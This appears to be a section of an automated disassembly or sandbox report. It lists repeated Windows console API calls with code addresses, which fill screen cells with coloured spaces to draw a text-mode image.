GetStdHandle.KERNEL32(000000F5), ref: 00401F68
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00401F92
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00401FA3
GetStdHandle.KERNEL32(000000F5), ref: 00401FA7
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000005,?,?), ref: 00401FD1
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000005,?,?), ref: 00401FE2
GetStdHandle.KERNEL32(000000F5), ref: 00401FE6
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000004,?,?), ref: 0040200F
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00402020
GetStdHandle.KERNEL32(000000F5), ref: 00402024
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00402048
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00402059
GetStdHandle.KERNEL32(000000F5), ref: 0040205D
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 00402084
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00402095
GetStdHandle.KERNEL32(000000F5), ref: 00402099
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004020C0
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004020D1
GetStdHandle.KERNEL32(000000F5), ref: 004020D5
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004020FC
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040210D
GetStdHandle.KERNEL32(000000F5), ref: 00402111
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000003,?,?), ref: 00402138
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00402149
GetStdHandle.KERNEL32(000000F5), ref: 0040214D
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402174
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402185
GetStdHandle.KERNEL32(000000F5), ref: 00402189
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000003,?,?), ref: 004021B0
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 004021C1
GetStdHandle.KERNEL32(000000F5), ref: 004021C5
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004021EC
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004021FD
GetStdHandle.KERNEL32(000000F5), ref: 00402201
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040222B
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040223C
GetStdHandle.KERNEL32(000000F5), ref: 00402240
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040226A
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040227B
GetStdHandle.KERNEL32(000000F5), ref: 0040227F
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004022A9
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004022BA
GetStdHandle.KERNEL32(000000F5), ref: 004022BE
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004022E8
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004022F9
GetStdHandle.KERNEL32(000000F5), ref: 004022FD
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402327
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402338
GetStdHandle.KERNEL32(000000F5), ref: 0040233C
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402366
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402377
GetStdHandle.KERNEL32(000000F5), ref: 0040237B
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004023A5
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 004023B6
GetStdHandle.KERNEL32(000000F5), ref: 004023BA
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004023E4
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 004023F5
GetStdHandle.KERNEL32(000000F5), ref: 004023F9
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 0040241D
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 0040242E
GetStdHandle.KERNEL32(000000F5), ref: 00402432
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402459
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040246A
GetStdHandle.KERNEL32(000000F5), ref: 0040246E
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402495
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004024A6
GetStdHandle.KERNEL32(000000F5), ref: 004024AA
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004024D1
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004024E2
GetStdHandle.KERNEL32(000000F5), ref: 004024E6
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 0040250D
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040251E
GetStdHandle.KERNEL32(000000F5), ref: 00402522
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402549
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040255A
GetStdHandle.KERNEL32(000000F5), ref: 0040255E
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 00402585
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402596
GetStdHandle.KERNEL32(000000F5), ref: 0040259A
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 004025C1
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004025D2
GetStdHandle.KERNEL32(000000F5), ref: 004025D6
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00402600
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00402611
GetStdHandle.KERNEL32(000000F5), ref: 00402615
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040263F
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402650
GetStdHandle.KERNEL32(000000F5), ref: 00402654
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040267E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040268F
GetStdHandle.KERNEL32(000000F5), ref: 00402693
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004026BD
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004026CE
GetStdHandle.KERNEL32(000000F5), ref: 004026D2
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004026FC
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040270D
GetStdHandle.KERNEL32(000000F5), ref: 00402711
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040273B
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040274C
GetStdHandle.KERNEL32(000000F5), ref: 00402750
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040277A
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040278B
GetStdHandle.KERNEL32(000000F5), ref: 0040278F
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004027B9
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004027CA
GetStdHandle.KERNEL32(000000F5), ref: 004027CE
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 004027F2
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00402803
GetStdHandle.KERNEL32(000000F5), ref: 00402807
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040282E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040283F
GetStdHandle.KERNEL32(000000F5), ref: 00402843
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040286A
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040287B
GetStdHandle.KERNEL32(000000F5), ref: 0040287F
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004028A6
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004028B7
GetStdHandle.KERNEL32(000000F5), ref: 004028BB
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004028E2
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004028F3
GetStdHandle.KERNEL32(000000F5), ref: 004028F7
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040291E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040292F
GetStdHandle.KERNEL32(000000F5), ref: 00402933
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040295A
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040296B
GetStdHandle.KERNEL32(000000F5), ref: 0040296F
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402996
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004029A7
GetStdHandle.KERNEL32(000000F5), ref: 004029AB
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004029D5
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 004029E6
GetStdHandle.KERNEL32(000000F5), ref: 004029EA
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402A14
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402A25
GetStdHandle.KERNEL32(000000F5), ref: 00402A29
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402A53
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402A64
GetStdHandle.KERNEL32(000000F5), ref: 00402A68
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402A92
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402AA3
GetStdHandle.KERNEL32(000000F5), ref: 00402AA7
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402AD1
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402AE2
GetStdHandle.KERNEL32(000000F5), ref: 00402AE6
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402B10
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402B21
GetStdHandle.KERNEL32(000000F5), ref: 00402B25
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402B4F
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402B60
GetStdHandle.KERNEL32(000000F5), ref: 00402B64
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402B8E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402B9F
GetStdHandle.KERNEL32(000000F5), ref: 00402BA3
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00402BC7
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00402BD8
GetStdHandle.KERNEL32(000000F5), ref: 00402BDC
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402C03
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402C14
GetStdHandle.KERNEL32(000000F5), ref: 00402C18
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402C3F
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402C50
GetStdHandle.KERNEL32(000000F5), ref: 00402C54
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 00402C7B
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402C8C
GetStdHandle.KERNEL32(000000F5), ref: 00402C90
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00402CBA
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00402CCB
GetStdHandle.KERNEL32(000000F5), ref: 00402CCF
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402CF9
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402D0A
GetStdHandle.KERNEL32(000000F5), ref: 00402D0E
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402D38
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402D49
GetStdHandle.KERNEL32(000000F5), ref: 00402D4D
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402D77
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402D88
GetStdHandle.KERNEL32(000000F5), ref: 00402D8C
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402DB6
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402DC7
GetStdHandle.KERNEL32(000000F5), ref: 00402DCB
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402DF5
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402E06
GetStdHandle.KERNEL32(000000F5), ref: 00402E0A
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402E34
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402E45
GetStdHandle.KERNEL32(000000F5), ref: 00402E49
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00402E6D
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00402E7E
GetStdHandle.KERNEL32(000000F5), ref: 00402E82
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402EA6
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402EB7
GetStdHandle.KERNEL32(000000F5), ref: 00402EBB
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402EE2
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402EF3
GetStdHandle.KERNEL32(000000F5), ref: 00402EF7
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402F1E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402F2F
GetStdHandle.KERNEL32(000000F5), ref: 00402F33
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402F5A
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402F6B
GetStdHandle.KERNEL32(000000F5), ref: 00402F6F
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00402F99
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00402FAA
GetStdHandle.KERNEL32(000000F5), ref: 00402FAE
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402FD8
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402FE9
GetStdHandle.KERNEL32(000000F5), ref: 00402FED
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403017
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403028
GetStdHandle.KERNEL32(000000F5), ref: 0040302C
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403056
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403067
GetStdHandle.KERNEL32(000000F5), ref: 0040306B
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403095
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004030A6
GetStdHandle.KERNEL32(000000F5), ref: 004030AA
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004030D4
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004030E5
GetStdHandle.KERNEL32(000000F5), ref: 004030E9
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403113
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403124
GetStdHandle.KERNEL32(000000F5), ref: 00403128
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403152
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403163
GetStdHandle.KERNEL32(000000F5), ref: 00403167
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 0040318B
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 0040319C
GetStdHandle.KERNEL32(000000F5), ref: 004031A0
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004031C7
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004031D8
GetStdHandle.KERNEL32(000000F5), ref: 004031DC
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 00403203
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00403214
GetStdHandle.KERNEL32(000000F5), ref: 00403218
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040323F
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403250
GetStdHandle.KERNEL32(000000F5), ref: 00403254
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040327B
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040328C
GetStdHandle.KERNEL32(000000F5), ref: 00403290
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004032B7
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004032C8
GetStdHandle.KERNEL32(000000F5), ref: 004032CC
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 004032F3
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403304
GetStdHandle.KERNEL32(000000F5), ref: 00403308
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403332
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403343
GetStdHandle.KERNEL32(000000F5), ref: 00403347
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403371
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403382
GetStdHandle.KERNEL32(000000F5), ref: 00403386
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004033B0
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 004033C1
GetStdHandle.KERNEL32(000000F5), ref: 004033C5
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004033EF
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00403400
GetStdHandle.KERNEL32(000000F5), ref: 00403404
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040342E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040343F
GetStdHandle.KERNEL32(000000F5), ref: 00403443
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040346D
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040347E
GetStdHandle.KERNEL32(000000F5), ref: 00403482
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004034AC
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004034BD
GetStdHandle.KERNEL32(000000F5), ref: 004034C1
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 004034E5
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 004034F6
GetStdHandle.KERNEL32(000000F5), ref: 004034FA
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403521
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403532
GetStdHandle.KERNEL32(000000F5), ref: 00403536
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 0040355D
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 0040356E
GetStdHandle.KERNEL32(000000F5), ref: 00403572
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000007,?,?), ref: 00403599
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000007,?,?), ref: 004035AA
GetStdHandle.KERNEL32(000000F5), ref: 004035AE
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000007,?,?), ref: 004035D5
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000007,?,?), ref: 004035E6
GetStdHandle.KERNEL32(000000F5), ref: 004035EA
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403614
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403625
GetStdHandle.KERNEL32(000000F5), ref: 00403629
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403653
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403664
GetStdHandle.KERNEL32(000000F5), ref: 00403668
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000005,?,?), ref: 00403692
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000005,?,?), ref: 004036A3
GetStdHandle.KERNEL32(000000F5), ref: 004036A7
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000005,?,?), ref: 004036D1
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000005,?,?), ref: 004036E2
GetStdHandle.KERNEL32(000000F5), ref: 004036E6
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403710
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403721
GetStdHandle.KERNEL32(000000F5), ref: 00403725
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040374F
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403760
GetStdHandle.KERNEL32(000000F5), ref: 00403764
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040378E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040379F
GetStdHandle.KERNEL32(000000F5), ref: 004037A3
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004037CD
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004037DE
GetStdHandle.KERNEL32(000000F5), ref: 004037E2
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00403806
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00403817
GetStdHandle.KERNEL32(000000F5), ref: 0040381B
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403842
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403853
GetStdHandle.KERNEL32(000000F5), ref: 00403857
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040387E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040388F
GetStdHandle.KERNEL32(000000F5), ref: 00403893
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004038BA
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004038CB
GetStdHandle.KERNEL32(000000F5), ref: 004038CF
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004038F9
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 0040390A
GetStdHandle.KERNEL32(000000F5), ref: 0040390E
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403938
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403949
GetStdHandle.KERNEL32(000000F5), ref: 0040394D
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000006,?,?), ref: 00403977
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000006,?,?), ref: 00403988
GetStdHandle.KERNEL32(000000F5), ref: 0040398C
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000006,?,?), ref: 004039B6
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000006,?,?), ref: 004039C7
GetStdHandle.KERNEL32(000000F5), ref: 004039CB
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004039F5
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403A06
GetStdHandle.KERNEL32(000000F5), ref: 00403A0A
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403A34
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403A45
GetStdHandle.KERNEL32(000000F5), ref: 00403A49
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403A73
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403A84
GetStdHandle.KERNEL32(000000F5), ref: 00403A88
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00403AAC
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00403ABD
GetStdHandle.KERNEL32(000000F5), ref: 00403AC1
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403AE8
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403AF9
GetStdHandle.KERNEL32(000000F5), ref: 00403AFD
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403B24
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403B35
GetStdHandle.KERNEL32(000000F5), ref: 00403B39
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403B60
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403B71
GetStdHandle.KERNEL32(000000F5), ref: 00403B75
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403B9C
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403BAD
GetStdHandle.KERNEL32(000000F5), ref: 00403BB1
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403BD8
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403BE9
GetStdHandle.KERNEL32(000000F5), ref: 00403BED
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00403C17
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00403C28
GetStdHandle.KERNEL32(000000F5), ref: 00403C2C
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403C56
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403C67
GetStdHandle.KERNEL32(000000F5), ref: 00403C6B
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000004,?,?), ref: 00403C95
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00403CA6
GetStdHandle.KERNEL32(000000F5), ref: 00403CAA
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000004,?,?), ref: 00403CD4
